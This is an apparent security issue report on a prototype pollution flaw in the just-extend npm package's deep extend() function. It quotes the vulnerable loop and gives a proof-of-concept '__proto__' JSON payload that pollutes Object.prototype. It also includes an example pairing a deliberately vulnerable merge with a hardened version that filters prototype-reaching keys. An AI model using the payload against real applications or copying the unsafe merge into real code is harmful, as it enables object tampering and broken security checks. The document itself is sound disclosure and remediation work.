
[email protected] — Prototype Pollution #594

@dfzysmy2tf-create

Description


hi, we are a security team. We found a Prototype Pollution vulnerability in your project.

Vulnerable File: just-extend/index.cjs (and index.mjs)

Vulnerability Type: Prototype Pollution

Severity Level: Critical

Vulnerability Analysis:

In deep copy mode (deep=true), the extend() function only uses Object.prototype.hasOwnProperty.call(extender, key) to check when iterating over the keys of the extender object, but fails to filter dangerous property names such as __proto__, constructor, and prototype. Attackers can contaminate Object.prototype by constructing malicious objects containing __proto__, affecting all objects.

Vulnerable Code (index.cjs Lines 37-50):

for (var key in extender) {
  if (Object.prototype.hasOwnProperty.call(extender, key)) {
    var value = extender[key];
    if (deep && isCloneable(value)) {
      var base = Array.isArray(value) ? [] : {};
      result[key] = extend(true, ..., value);  // key not filtered for __proto__
    } else {
      result[key] = value;  // key not filtered for __proto__
    }
  }
}

POC:

const extend = require('just-extend');

// Verify before attack
const testObj = {};
console.log('Before:', testObj.polluted); // undefined

// Construct malicious payload
const malicious = JSON.parse('{"__proto__":{"polluted":"yes"}}');
extend(true, {}, malicious);

// Verify after attack - all objects are polluted
const newObj = {};
console.log('After:', newObj.polluted); // "yes"
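
An added example, not code from the just-extend project or from the reporter: a minimal recursive deep merge written in the pattern the report describes (for every own key of the extender, recurse into target[key]) beside a hardened variant that skips the keys __proto__, constructor and prototype and only recurses into properties the target actually owns. The function names mergeUnsafe, mergeSafe, isPlainObject and pollutes, and the payload string, are assumptions made for this example; the payload is constructed here, not taken from the issue.

```javascript
// Added example (not just-extend's code): a recursive merge in the style the
// report describes, and a hardened variant. Run with Node.

// Keys through which a write can reach a shared prototype.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable pattern: target[key] is read through the prototype chain, so for
// key "__proto__" on a plain target the recursion receives Object.prototype
// itself and copies the payload's properties onto it.
function mergeUnsafe(target, source) {
  for (const key in source) {
    if (!Object.prototype.hasOwnProperty.call(source, key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const existing = isPlainObject(target[key]) ? target[key] : {};
      target[key] = mergeUnsafe(existing, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened pattern: refuse the three prototype-reaching keys outright, take
// only own enumerable keys of the source, and recurse only into an object the
// target owns itself (never an inherited one).
function mergeSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (UNSAFE_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const ownObject =
        Object.prototype.hasOwnProperty.call(target, key) && isPlainObject(target[key]);
      target[key] = mergeSafe(ownObject ? target[key] : {}, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed payload (assumption for this example): JSON.parse yields an own
// data property literally named "__proto__", which for-in and Object.keys see.
const PAYLOAD = '{"__proto__":{"polluted":"yes"}}';

// Runs mergeFn on a fresh target with the payload and reports whether a brand
// new object now inherits "polluted". Cleans Object.prototype afterwards so
// the two runs do not influence each other.
function pollutes(mergeFn, payloadJson) {
  const payload = JSON.parse(payloadJson);
  try {
    mergeFn({}, payload);
    return ({}).polluted === 'yes';
  } finally {
    delete Object.prototype.polluted;
  }
}

console.log('unsafe merge pollutes Object.prototype:', pollutes(mergeUnsafe, PAYLOAD));
console.log('safe merge pollutes Object.prototype:', pollutes(mergeSafe, PAYLOAD));
```

The hardened variant still merges ordinary nested data; the only behavioural difference is that a source key named __proto__, constructor or prototype is dropped instead of followed, and an object inherited by the target is never used as a recursion base.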
